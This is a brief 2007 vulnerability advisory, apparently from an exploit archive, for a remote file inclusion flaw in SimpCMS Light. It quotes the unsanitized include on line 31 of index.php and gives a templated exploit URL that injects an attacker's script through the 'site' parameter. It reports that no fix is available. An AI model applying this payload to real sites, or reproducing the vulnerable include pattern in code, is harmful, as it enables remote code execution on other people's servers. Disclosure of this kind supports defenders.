SimpCMS <= 04.10.2007 (site) Remote File Inclusion Vulnerability

2007-04-10 00:00:00

Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: [email protected]
---

Script: SimpCMS Light

Download: http://www.simpcms.com/light/normal/simp-cms-light.zip

--

Bug File: index.php

Bug code in line 31:
include $site.".php";

--

Exploit:
http://site.com/[path]/index.php?site=[EvilScript]

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.